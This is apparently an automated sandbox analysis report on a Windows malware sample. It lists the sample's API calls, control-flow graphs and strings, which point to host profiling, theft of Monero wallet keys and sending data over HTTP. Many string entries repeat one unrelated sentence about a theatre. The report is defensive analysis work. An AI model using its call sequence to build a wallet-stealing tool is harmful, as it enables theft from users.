                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: fdb308ecdcd158cebec9e7ce6dbdbb2992e5331277049395aa64b5b79edfd418
                                  • Instruction ID: e5b84c37a9f284f10df3e7920aa9e3cd222a8f09a2a9c781b1afbde8fccb9894
                                  • Opcode Fuzzy Hash: fdb308ecdcd158cebec9e7ce6dbdbb2992e5331277049395aa64b5b79edfd418
                                  • Instruction Fuzzy Hash: 27A12EB55046509FD3BCDFA8F5889663FF9FF88702784853AA62A8324CD63A94C1DB50
                                  Function 00F645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 677 f645c0-f64695 RtlAllocateHeap 694 f646a0-f646a6 677->694 695 f6474f-f647a9 VirtualProtect 694->695 696 f646ac-f6474a 694->696 696->694
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F6460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F6479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64622
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: bbbc160406c45016309933f2df12156990cdda9713d444969e7672ae8e61db54
                                  • Instruction ID: 01cead371d9689336bcc8932409f78da830628aa4b42876547fd4ce82005d168
                                  • Opcode Fuzzy Hash: bbbc160406c45016309933f2df12156990cdda9713d444969e7672ae8e61db54
                                  • Instruction Fuzzy Hash: 1241D9607C560D6BE6E4B7E8D84EDDE7A96FFC6F04F605044AC249B2D0C660A980D73B
                                  Function 00F64880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 f64880-f64942 call f7a7a0 call f647b0 call f7a740 * 5 InternetOpenA StrCmpCA 816 f64944 801->816 817 f6494b-f6494f 801->817 816->817 818 f64955-f64acd call f78b60 call f7a920 call f7a8a0 call f7a800 * 2 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a920 call f7a8a0 call f7a800 * 2 InternetConnectA 817->818 819 f64ecb-f64ef3 InternetCloseHandle call f7aad0 call f69ac0 817->819 818->819 905 f64ad3-f64ad7 818->905 829 f64ef5-f64f2d call f7a820 call f7a9b0 call f7a8a0 call f7a800 819->829 830 f64f32-f64fa2 call f78990 * 2 call f7a7a0 call f7a800 * 8 819->830 829->830 906 f64ae5 905->906 907 f64ad9-f64ae3 905->907 908 f64aef-f64b22 HttpOpenRequestA 906->908 907->908 909 f64ebe-f64ec5 InternetCloseHandle 908->909 910 f64b28-f64e28 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a740 call f7a920 * 2 call f7a8a0 call f7a800 * 2 call f7aad0 lstrlen call f7aad0 * 2 lstrlen call f7aad0 HttpSendRequestA 908->910 909->819 1021 f64e32-f64e5c InternetReadFile 910->1021 1022 f64e67-f64eb9 InternetCloseHandle call f7a800 1021->1022 1023 f64e5e-f64e65 1021->1023 1022->909 1023->1022 1024 f64e69-f64ea7 call f7a9b0 call f7a8a0 call f7a800 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F64915
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F6493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F64ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F80DDB,00000000,?,?,00000000,?,",00000000,?,016FE590), ref: 00F64DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F64E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F64E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F64E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00F64EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00F64EC5
                                  • HttpOpenRequestA.WININET(00000000,016FE490,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F64B15
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00F64ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 43a925830a0296d2b4060deac2297e914a6292dc97f0656ad04689d4a97d923f
                                  • Instruction ID: 6361fd0d0d29ff5174901f574c589b9dd9e0cea49cd3012ae4af8f9001957184
                                  • Opcode Fuzzy Hash: 43a925830a0296d2b4060deac2297e914a6292dc97f0656ad04689d4a97d923f
                                  • Instruction Fuzzy Hash: 2E120F71910118AADB15EBA0DC92FEEB738BF54300F5181AAB11A63091EF746F49DF63
                                  Function 00F778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00F7792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: a5bce1f879088ffb157d8928cd9427a378feb7b4c0ff2e3ca49a61578de8e6d8
                                  • Instruction ID: 25b8ccd6d55f45ec8eff2c4dfdc992d026626f5e5d55ccc1b2a4a33c61bbd56e
                                  • Opcode Fuzzy Hash: a5bce1f879088ffb157d8928cd9427a378feb7b4c0ff2e3ca49a61578de8e6d8
                                  • Instruction Fuzzy Hash: BC0186B1904305EBC714DF99D945BABBBB8FB44B21F50422AF655E3280C7745944CBA2
                                  Function 00F77850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F611B7), ref: 00F77880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F7789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 51e2d68abd6138b9517f868c75a39b2a5b41fd086c3d787a4e080fff98174221
                                  • Instruction ID: 56def49445f3685fe6f65b08d6994ae863e0f55f2ccfa0a5d7dadc3a06ccaa97
                                  • Opcode Fuzzy Hash: 51e2d68abd6138b9517f868c75a39b2a5b41fd086c3d787a4e080fff98174221
                                  • Instruction Fuzzy Hash: 0EF04FB1944209ABC714DF98D949FAEBFB8FB04B11F10026AFA15A3680C7795944CBA2
                                  Function 00F61160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 40e9377b927b07c8f55c5bc493706a072c2bac325ecde980279db8499a449d38
                                  • Instruction ID: b2f732018abbf0f4aad78037c748e9929f96d76258693faf5f1c43d774dfc1b6
                                  • Opcode Fuzzy Hash: 40e9377b927b07c8f55c5bc493706a072c2bac325ecde980279db8499a449d38
                                  • Instruction Fuzzy Hash: 2DD017749002089BCB149AE0A8496AEBF7CFB08211F400564D90662240EA315881CBA5
                                  Function 00F79C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 f79c10-f79c1a 634 f7a036-f7a0ca LoadLibraryA * 8 633->634 635 f79c20-f7a031 GetProcAddress * 43 633->635 636 f7a146-f7a14d 634->636 637 f7a0cc-f7a141 GetProcAddress * 5 634->637 635->634 638 f7a216-f7a21d 636->638 639 f7a153-f7a211 GetProcAddress * 8 636->639 637->636 640 f7a21f-f7a293 GetProcAddress * 5 638->640 641 f7a298-f7a29f 638->641 639->638 640->641 642 f7a337-f7a33e 641->642 643 f7a2a5-f7a332 GetProcAddress * 6 641->643 644 f7a344-f7a41a GetProcAddress * 9 642->644 645 f7a41f-f7a426 642->645 643->642 644->645 646 f7a4a2-f7a4a9 645->646 647 f7a428-f7a49d GetProcAddress * 5 645->647 648 f7a4dc-f7a4e3 646->648 649 f7a4ab-f7a4d7 GetProcAddress * 2 646->649 647->646 650 f7a515-f7a51c 648->650 651 f7a4e5-f7a510 GetProcAddress * 2 648->651 649->648 652 f7a612-f7a619 650->652 653 f7a522-f7a60d GetProcAddress * 10 650->653 651->650 654 f7a67d-f7a684 652->654 655 f7a61b-f7a678 GetProcAddress * 4 652->655 653->652 656 f7a686-f7a699 GetProcAddress 654->656 657 f7a69e-f7a6a5 654->657 655->654 656->657 658 f7a6a7-f7a703 GetProcAddress * 4 657->658 659 f7a708-f7a709 657->659 658->659
                                  APIs
